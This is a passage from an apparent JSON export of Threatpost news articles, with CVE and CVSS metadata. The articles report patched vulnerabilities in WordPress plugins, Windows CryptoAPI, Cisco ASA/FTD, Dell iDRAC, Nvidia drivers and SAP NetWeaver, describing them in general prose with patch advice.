["CVE-2019-11510", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-17T20:56:34", "id": "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "href": "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:07", "description": "Researchers are warning of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\nComments \u2013 wpDiscuz enables WordPress websites to add custom comment forms and fields to sites, and serves as an alternative to services like Disqus. Researchers with Wordfence, who discovered the flaw, have notified[ the plugin\u2019s developer](<https://wordpress.org/plugins/wpdiscuz/>), gVectors, which issued a patch on July 23.\n\nWith a CVSS score of 10 out of 10, the glitch is considered critical in severity, and researchers are urging website administrators to ensure that they update.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability was introduced in the plugin\u2019s latest major version update,\u201d said Wordfence researchers [in a Tuesday post](<https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/>). \u201cThis is considered a critical security issue that could lead to remote code execution on a vulnerable site\u2019s server. If you are running any version from 7.0.0 to 7.0.4 of this plugin, we highly recommend updating to the patched version, 7.0.5, immediately.\u201d\n\nThreatpost has reached out to gVectors for further comment.\n\n## **The Flaw**\n\nIn the latest overhaul of the plugin (versions 7.x.x), its developers added a feature that gives users the ability to include image attachments in comments that are uploaded to a website.\n\nHowever, the implementation of this feature lacked security protections vetting file attachments in the comments to make sure they actually are image files, versus another type of file.\n\nThis lack of verification could allow an unauthenticated user to upload any type of file, including PHP files. To pass the file content-verification check, an attacker would simply need to add an image to make any file look like the allowed file type.\n\nAfter uploading a file, the file-path location is returned as part of the request\u2019s response, allowing the attacker to easily find the file\u2019s location and access it. This means that attackers could upload arbitrary PHP files and then access those files to trigger their execution on the server, achieving remote code execution, said researchers.\n\n\u201cIf exploited, this vulnerability could allow an attacker to execute commands on your server and traverse your hosting account to further infect any sites hosted in the account with malicious code,\u201d said researchers. \u201cThis would effectively give the attacker complete control over every site on your server.\u201d\n\n## **WordPress Plugin Bugs**\n\nWordPress plugins continue to be plagued by vulnerabilities, which have dire consequences for websites. Earlier in July, [it was discovered that the](<https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/>) Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n**_Complimentary Threatpost Webinar__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c__[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)__\u201d brings top cloud-security experts together to explore how __Confidential Computing__ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us __[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) __for this__ FREE __live webinar._**\n", "cvss3": {}, "published": "2020-07-29T16:32:00", "type": "threatpost", "title": "Critical Security Flaw in WordPress Plugin Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-07-29T16:32:00", "id": "THREATPOST:EFC814A6564326F98824AC875F125E0D", "href": "https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:20:44", "description": "A high-severity cross-site request forgery (CSRF) vulnerability in Real-Time Find and Replace, a WordPress plugin installed on more than 100,000 sites, could lead to cross-site scripting and the injection of malicious JavaScript anywhere on a victim site.\n\nAccording to research from Wordfence [released on Monday](<https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/>), the malicious code injection could be used to create a new administrative user account, steal session cookies, redirect users to a malicious site, obtain administrative access or to infect innocent visitors browsing a compromised site with a drive-by malware attack.\n\nReal-Time Find and Replace allows administrators to dynamically replace any HTML content on WordPress sites with new content without permanently changing the source content, right before a page is delivered to a user\u2019s browser. Any replacement code or content executes anytime a user navigates to a page that contains the original content.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cTo provide this functionality, the plugin registers a sub-menu page tied to the function far_options_page with a capability requirement to \u2018activate_plugins,'\u201d explained Wordfence researcher Chloe Chamberland, in a Monday posting. \u201cThe far_options_page function contains the core of the plugin\u2019s functionality for adding new find-and-replace rules. Unfortunately, that function failed to use nonce verification, so the integrity of a request\u2019s source was not verified during rule update, resulting in a CSRF vulnerability.\u201d\n\nCross-site request forgery attacks (CSRF or XSRF for short) are used to send malicious requests from an authenticated user to a web application. Thus, a successful exploit of the bug does require user interaction: An attacker would need to trick a site\u2019s administrator into clicking on a malicious link in a comment or email, according to Wordfence.\n\nAttackers could particularly wreak havoc if they used the bug to replace the &lt;head&gt; HTML tag with malicious JavaScript, she added. Because most pages contain a &lt;head&gt; HTML tag for the page header, once replacement would cause the malicious code to execute on every page of the affected site.\n\nUpdating to the latest version of the plugin, version 4.0.2, will implement a fix for the issue.\n\n\u201cIn the most up to date version, a nonce has been added along with a check_admin_referer nonce verification function to ensure the legitimacy of the source of a request,\u201d said Chamberland.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. For instance, in April a pair of security vulnerabilities (one of them critical) in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath a WordPress plugin with more than 200,000 installations.\n\nIn March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-04-28T15:08:17", "type": "threatpost", "title": "WordPress Plugin Bug Opens 100K Websites to Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-04-28T15:08:17", "id": "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "href": "https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T23:22:05", "description": "Two proof-of-concept (PoC) exploits have been publicly released for the recently-patched [crypto-spoofing vulnerability](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) found by the [National Security Agency](<https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/>) and [reported to Microsoft](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).\n\nThe vulnerability ([CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>)) could enable an attacker to spoof a code-signing certificate (necessary for validating executable programs in Windows) in order to make it appear like an application was from a trusted source. The flaw made headlines when it was disclosed earlier this week as part of Microsoft\u2019s January Patch Tuesday security bulletin. It marked the first time the NSA had ever publicly reported a bug to Microsoft.\n\nThe two PoC exploits were published to GitHub on Thursday. Either could potentially allow an attacker to launch MitM (man-in-the-middle) attacks \u2013 allowing an adversary to spoof signatures for files and emails and fake signed-executable code inside programs that are launched inside Windows. One PoC exploit was released [by Kudelski Security](<https://github.com/kudelskisecurity/chainoffools>) and the other by a security researcher [under the alias \u201cOllypwn\u201d](<https://github.com/ollypwn/cve-2020-0601>).\n\n**[Listen to further analysis of the Microsoft crypto flaw, below, on the Threatpost Podcast] **\n\n[](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/12754238/height/90/theme/custom/thumbnail/yes/direction/backward/render-playlist/no/custom-color/87A93A/%20height=90%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\nAccording to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>), the spoofing vulnerability exists in the way Windows CryptoAPI (Microsoft\u2019s API that enables developers to secure Windows-based applications using cryptography) validates Elliptic Curve Cryptography (ECC) certificates. Kudelski Security [in a blog post](<https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc>) said they launched the PoC using a \u201ccurve P384\u201d certificate, which uses ECC (specifically, the USERTrust ECC Certificate Authority). Researcher were able to craft a key used to sign the \u201ccurve P384\u201d certificate with an arbitrary domain name. This certificate would subsequently be recognized by Windows\u2019 CryptoAPI as trusted.\n\nAnother similar PoC exploit [was publicly released](<https://twitter.com/ollypwn/status/1217585156296450048>) by Denmark-based security expert \u201cOllypwn.\u201d\n\n\u201cWhen Windows checks whether the certificate is trusted, it\u2019ll see that it has been signed by our spoofed CA,\u201d said \u201cOllypwn\u201d in a [write up of his PoC exploit](<https://github.com/ollypwn/cve-2020-0601/blob/master/README.md>). \u201cIt then looks at the spoofed CA\u2019s public key to check against trusted CA\u2019s. Then it simply verifies the signature of our spoofed CA with the spoofed CA\u2019s generator \u2013 this is the issue.\u201d\n\nA third PoC exploit was developed by security expert Saleem Rashid[; who said on Twitter](<https://twitter.com/saleemrash1d/status/1217495681230954506?s=20>), Wednesday, that the PoC allowed him to fake TLS certificates and set up sites that look like legitimate ones. However, Rashid did not make his PoC exploit code public.\n\n> CVE-2020-0601 [pic.twitter.com/8tJsJqvnHj](<https://t.co/8tJsJqvnHj>)\n> \n> \u2014 Saleem Rashid (@saleemrash1d) [January 15, 2020](<https://twitter.com/saleemrash1d/status/1217495681230954506?ref_src=twsrc%5Etfw>)\n\nResearchers say that while the recently-released PoC exploits work, they show that the flaw is not easily exploitable for attackers, particularly because victims would also need to first visit a very specific website, making a targeted attack more difficult.\n\n\u201cIn the end, please keep in mind that such a vulnerability is not at risk of being exploited by script kiddies or ransomware,\u201d Kudelski Security researchers said in their analysis. \u201cWhile it is still a big problem because it could have allowed a Man-in-the-Middle attack against any website, you would need to face an adversary that owns the network on which you operate, which is possible for nation-state adversaries, but less so for a script kiddie.\u201d\n\n[Tech support site AskWoody](<https://www.askwoody.com/2020/theres-a-working-proof-of-concept-for-the-chainoffools-cve-2020-0601-crypto-api-bug-but-it-isnt-as-bad-as-you-think/>) agreed: \u201cThere\u2019s no question the code works \u2014 but it has a prerequisite. In order to get bitten by the security hole, you have to first visit a specific site. That site will load a security certificate that\u2019s instrumental in making the PoC code work. That severely limits the threat, eh?\u201d\n\nDespite the roadblocks to exploitation, security experts say that publicly-released PoC exploits can pave the way for future exploitation of CVE-2020-0601 by adversaries. Researchers urge Microsoft customers to make sure that their systems are up to date.\n\n\u201cAssume that this vulnerability has already been weaponized, probably by criminals and certainly by major governments,\u201d Bruce Schneier said in a [Wednesday analysis](<https://www.schneier.com/blog/archives/2020/01/critical_window.html>). \u201cEven assume that the NSA is using this vulnerability \u2014 why wouldn\u2019t it?\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n", "cvss3": {}, "published": "2020-01-16T16:05:57", "type": "threatpost", "title": "PoC Exploits Published For Microsoft Crypto Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-16T16:05:57", "id": "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "href": "https://threatpost.com/poc-exploits-published-for-microsoft-crypto-bug/151931/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-10-15T22:16:12", "description": "Cisco is warning that a high-severity flaw in its network security software is being actively exploited \u2013 allowing remote, unauthenticated attackers to access sensitive data.\n\nPatches for the vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) in question, which ranks 7.5 out of 10 on the CVSS scale, were [released last Wednesday](<https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/>). However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code and active exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw specifically exists in the web services interface of Firepower Threat Defense (FTD) software, which is part of Cisco\u2019s suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\nThe potential threat surface is vast: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) recently found 85,000 internet-accessible ASA/FTD devices. Worse, 398 of those are spread across 17 percent of the Fortune 500, researchers said.\n\nThe flaw stems from a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\nSoon after patches were released, proof-of-concept (POC) exploit code was [released Wednesday](<https://twitter.com/aboul3la>) for the flaw by security researcher Ahmed Aboul-Ela.\n\nA potential attacker can view more sensitive files within the web services file system: The web services files may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\n> There\u2019s a proof of concept doing the rounds for directory path traversal (yes, it\u2019s 1998 again) in Cisco AnyConnect SSL VPN. \n> \n> It\u2019s already being mass spammed across internet. \n> \n> As far as I can see people can only read LUA source files so far, so not terribly problematic as is. <https://t.co/kSIFQdz1go>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [July 24, 2020](<https://twitter.com/GossiTheDog/status/1286614404054880256?ref_src=twsrc%5Etfw>)\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/27115136/cisco-vulnerability-patch.png>)\n\nCredit: Rapid7\n\nResearchers with Rapid7 say that since the patch was issued, only about 10 percent of Cisco ASA/FTD devices detected as internet-facing have been rebooted \u2013 which is a \u201clikely indicator they\u2019ve been patched.\u201d Only 27 of the 398 detected in Fortune 500 companies appear to have been rebooted.\n\nResearchers encourage immediate patching of vulnerable ASA/FTD installations \u201cto prevent attackers from obtaining sensitive information from these devices which may be used in targeted attacks.\u201d\n\n\u201cCisco has provided fixes for all supported versions of ASA and FTD components,\u201d said researchers. \u201cCisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.\u201d\n\n_**Complimentary Threatpost Webinar**: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts together to explore how **Confidential**** Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar._\n", "cvss3": {}, "published": "2020-07-27T16:23:16", "type": "threatpost", "title": "Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452"], "modified": "2020-07-27T16:23:16", "id": "THREATPOST:FB3A73274A678D5DA8D5263B9E1A1DA1", "href": "https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:16:11", "description": "Researchers have disclosed details of a recently patched, high-severity Dell PowerEdge server flaw, which if exploited could allow an attacker to fully take over and control server operations.\n\nThe web vulnerability was found in the Dell EMC iDRAC remote access controller, technology embedded within the latest versions of Dell PowerEdge servers. While the vulnerability was fixed earlier in July, Georgy Kiguradze and Mark Ermolov, the researchers with Positive Technologies who discovered the flaw, published a detailed analysis, Tuesday.\n\nThe path traversal vulnerability ([CVE-2020-5366](<https://www.dell.com/support/article/en-us/sln322125/dsa-2020-128-idrac-local-file-inclusion-vulnerability?lang=en>)), found in Dell EMC iDRAC9 versions prior to 4.20.20.20, is rated as a 7.1 in terms of exploitability, giving it a high-severity vulnerability rating, according to [an advisory](<https://www.dell.com/support/article/pt-pt/sln322125/dsa-2020-128-idrac-local-file-inclusion-vulnerability?lang=en>) published online by Dell.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nPath traversal is one of the three most common vulnerabilities researchers said that they come across in their investigations. If exploited, the flaw can allow attackers to view the content of server folders that should not be accessible even to someone who\u2019s logged in as an ordinary site user. iDRAC runs on Linux, and the specific appeal to hackers in exploiting the vulnerability would be the ability to read the file /etc/passwd, which stores information about Linux users, the researchers said.\n\nAn example of how this can be used by attackers is a recent attack on [two vulnerabilities](<https://www.forbes.com/sites/kateoflahertyuk/2020/06/04/zoom-users-beware-here-are-two-critical-reasons-to-update-your-app/#461dbfdd1767>) found on the Zoom video conferencing app that could allow remote attackers to breach the system of any participant in a group call. Indeed, a remote, authenticated malicious user with low privileges could potentially exploit the iDRAC flaw by manipulating input parameters to gain unauthorized read access to the arbitrary files, Dell EMC warned in its advisory.\n\niDRAC is designed to allow IT administrators to remotely deploy, update, monitor and maintain Dell servers without installing new software. Dell has already released an update to the iDRAC firmware that fixes the flaw and it recommends customers update as soon as possible.\n\nThe vulnerability can only be exploited if iDRAC is connected to the internet, which Dell EMC does not recommend, researchers said. IDRAC also is a relatively new technology in Dell EMC servers, which means it may not be widely used yet.\n\nStill, researchers said that public search engines already discovered several Internet-accessible connections to iDRAC that could be exploited, as well as 500 controllers available for access using SNMP.\n\nThe iDRAC controller is used by network administrators to manage key servers, \u201ceffectively functioning as a separate computer inside the server itself,\u201d Kiguradze explained in a press statement.\n\n\u201ciDRAC runs on ordinary Linux, although in a limited configuration, and has a fully-fledged file system,\u201d he said. \u201cThe vulnerability makes it possible to read any file in the controller\u2019s operating system, and in some cases, to interfere with operation of the controller\u2013for instance during reading symbolic Linux devices like /dev/urandom.\u201d\n\nAttackers can exploit the flaw externally by obtaining the back-up of a privileged user or if they have credentials or brute-force their way in, Kiguradze said. They also could use the account of a junior administrator with limited server access to exploit the flaw internally, he said. Once an attacker gains control, he or she can externally block or disrupt the server\u2019s operation.\n\nTo better secure Dell servers that use iDRAC, researchers recommended that customers place iDRAC on a separate administration network and don\u2019t connect the controller to the internet. Companies also should isolate the administration network or VLAN (such as with a firewall) and restrict access to the subnet or VLAN to authorized server administrators only.\n\nOther recommendations by Dell EMC to secure iDRAC against intrusion include using 256-bit encryption and TLS 1.2 or later; configuration options such as IP address range filtering and system lockdown mode; and additional authentication such as Microsoft Active Directory or LDAP.\n\n_**Complimentary Threatpost Webinar: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\u201d brings top cloud-security experts together to explore how Confidential Computing is a game changer for securing dynamic cloud data and preventing IP exposure. Join us [Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) for this FREE live webinar.**_\n", "cvss3": {}, "published": "2020-07-28T13:11:01", "type": "threatpost", "title": "Researchers Warn of High-Severity Dell PowerEdge Server Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5366"], "modified": "2020-07-28T13:11:01", "id": "THREATPOST:9C49BCB0388D167E73DA96F633225C8F", "href": "https://threatpost.com/researchers-warn-of-high-severity-dell-poweredge-server-flaw/157795/", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:17:47", "description": "Graphics chipmaker Nvidia has fixed two high-severity flaws in its graphics drivers. Attackers can exploit the vulnerabilities to view sensitive data, gain escalated privileges or launch denial-of-service (DoS) attacks in impacted Windows gaming devices.\n\nNvidia\u2019s graphics driver (also known as the GPU Display Driver) for Windows is used in devices targeted to enthusiast gamers; it\u2019s the software component that enables the device\u2019s operating system and programs to use its high-level, gaming-optimized graphics hardware.\n\nOne of the vulnerabilities, CVE-2020-5962, exists in the Nvidia Control Panel component, which provides control of the graphics driver settings as well as other utilities installed on the system. The flaw could allow an attacker with local system access to corrupt a system file, which may lead to DoS or escalation of privileges, according to Nvidia\u2019s [Wednesday security advisory.](<https://nvidia.custhelp.com/app/answers/detail/a_id/5031>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAnother vulnerability (CVE\u20112020\u20115963) exists in the CUDA Driver, a computing platform and programming model invented by Nvidia. The issue stems from improper access control in the driver\u2019s Inter Process Communication APIs. It could lead to lead to code execution, DoS or information disclosure.\n\nThe display driver also contains four medium-severity flaws, existing in the service host component (CVE\u20112020\u20115964), the DirectX 11 user mode driver (CVE\u20112020\u20115965), the the kernel mode layer (CVE\u20112020\u20115966) and the UVM driver (CVE\u20112020\u20115967).\n\nVarious drivers are affected for Windows and Linux users, including ones that use Nvidia\u2019s GeForce, Quadro and Tesla software. A full list of affected \u2013 and updated \u2013 versions are below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/25101158/nvidia-patches.png>)\n\nNvidia also stomped out four high-severity flaws in its Virtual GPU (vGPU) manager, its tool that enables multiple virtual machines to have simultaneous, direct access to a single physical GPU, while also using Nvidia graphics drivers deployed on non-virtualized operating systems.\n\nIn this case, the software does not restrict (or incorrectly restricts) operations within the boundaries of a resource that could be accessed by using an index or pointer, such as memory or files. That may lead to code execution, DoS, escalation of privileges or information disclosure (CVE\u20112020\u20115968), warned Nvidia.\n\nAnother flaw stems from the vGPU plugin validating shared resources before using them, creating a race condition which may lead to DoS or information disclosure (CVE\u20112020\u20115969). And in another glitch, input data size is not validated in the vGPU plugin, which may lead to tampering or denial of service (CVE\u20112020\u20115970).\n\nThe final vGPU flaw (CVE\u20112020\u20115971) stems from the software reading from a buffer by using buffer access mechanisms (such as indexes or pointers) that reference memory locations after the targeted buffer. This could lead to code execution, DoS, escalated privileges, or information disclosure.\n\nIt\u2019s only the latest slew of patches that Nvidia has issued. Earlier in March, the [company fixed several high-severity vulnerabilities](<https://threatpost.com/gamer-alert-serious-nvidia-flaw-plagues-graphics-driver/153380/>) in its graphics driver, which can be exploited by a local attacker to launch DoS or code-execution attacks. Last year, Nvidia issued fixes for [high-severity flaws](<https://threatpost.com/gamers-hit-with-nvidia-gpu-driver-geforce-flaws/149992/>) in two popular gaming products, including its graphics driver for Windows and GeForce Experience. The flaws could be exploited to launch an array of malicious attacks \u2013 from DoS to escalation of privileges. Also in 2019, [Nvidia patched](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) another high-severity vulnerability in its GeForce Experience software, which could lead to code-execution or DoS of products, if exploited.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T14:44:18", "type": "threatpost", "title": "Nvidia Warns Windows Gamers of Serious Graphics Driver Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5962"], "modified": "2020-06-25T14:44:18", "id": "THREATPOST:972202A633AD7E38B95647F050D95060", "href": "https://threatpost.com/nvidia-windows-gamers-graphics-driver-bugs/156911/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:50", "description": "A critical vulnerability, carrying a severity score of 10 out of 10 on the CvSS bug-severity scale, has been disclosed for SAP customers.\n\nSAP\u2019s widely deployed collection of enterprise resource planning (ERP) software is used to manage their financials, logistics, customer-facing organizations, human resources and other business areas. As such, the systems contain plenty of sensitive information.\n\nAccording to [an alert](<https://us-cert.cisa.gov/ncas/alerts/aa20-195a>) from the Department of Homeland Security, successful exploitation of the bug opens the door for attackers to read and modify financial records; change banking details; read personal identifiable information (PII); administer purchasing processes; sabotage or disrupt operations; achieve operating system command execution; and delete or modify traces, logs and other files.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug ([CVE-2020-6287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287>)) has been named RECON by the Onapsis Research Labs researchers that found it, and it affects more than 40,000 SAP customers, they noted. SAP [delivered a patch](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675>) for the issue on Tuesday as part of its July 2020 Security Note.\n\n\u201cIt stands for Remotely Exploitable Code On NetWeaver,\u201d Mariano Nunez, CEO of Onapsis, told Threatpost. \u201cThis vulnerability resides inside SAP NetWeaver Java versions 7.30 to 7.50 (the latest version as of [our analysis publication]. All Support Packages tested to date were vulnerable. SAP NetWeaver is the base layer for several SAP products and solutions.\u201d\n\nAn attacker leveraging this vulnerability will have unrestricted access to critical business information and processes in a variety of different scenarios, according to the firm.\n\n## **NetWeaver Java Woes**\n\nThe bug affects a default component present in every SAP application running the SAP NetWeaver Java technology stack, according to Onapsis. This technical component is used in many SAP business solutions, such as SAP S/4HANA, SAP SCM, SAP CRM, SAP CRM, SAP Enterprise Portal, SAP Solution Manager (SolMan) and many others, the researchers said.\n\nAccording to DHS, the vulnerability is introduced due to the lack of authentication in a web component of the SAP NetWeaver AS for Java, allowing for several high-privileged activities on the SAP system. A remote, unauthenticated attacker can exploit this vulnerability through an HTTP interface, which is typically exposed to end users and, in many cases, exposed to the internet.\n\n\u201cIf successfully exploited, a remote, unauthenticated attacker can obtain unrestricted access to SAP systems through the creation of high-privileged users and the execution of arbitrary operating system commands with the privileges of the SAP service user account (`<sid>adm`), which has unrestricted access to the SAP database and is able to perform application maintenance activities, such as shutting down federated SAP applications,\u201d according to the alert.\n\n## Impact\n\nPut another way, an unauthenticated attacker could create a new SAP user with maximum privileges, bypassing all access and authorization controls (such as segregation of duties, identity management, and governance, risk and compliance solutions) and gaining full control of SAP systems, Nunez said.\n\n\u201cWith SAP NetWeaver Java being a fundamental base layer for several SAP products, the specific impact would vary depending on the affected system,\u201d according to Onapsis, in a [technical analysis](<https://www.onapsis.com/recon-sap-cyber-security-vulnerability>) released on Tuesday. \u201cIn particular, there are different SAP solutions running on top of NetWeaver Java which share a common particularity: they are hyper-connected through APIs and interfaces. In other words, these applications are attached to other systems, both internal and external, usually leveraging high-privileged trust relationships.\u201d\n\nAnd while this is bad enough, the RECON vulnerability\u2019s risk increases when the affected solutions are exposed to the internet, to connect companies with business partners, employees and customers. These systems \u2013 Onapsis estimates there are at least 2,500 of them \u2013 have an increased likelihood of remote attacks, researchers said. Out of those vulnerable 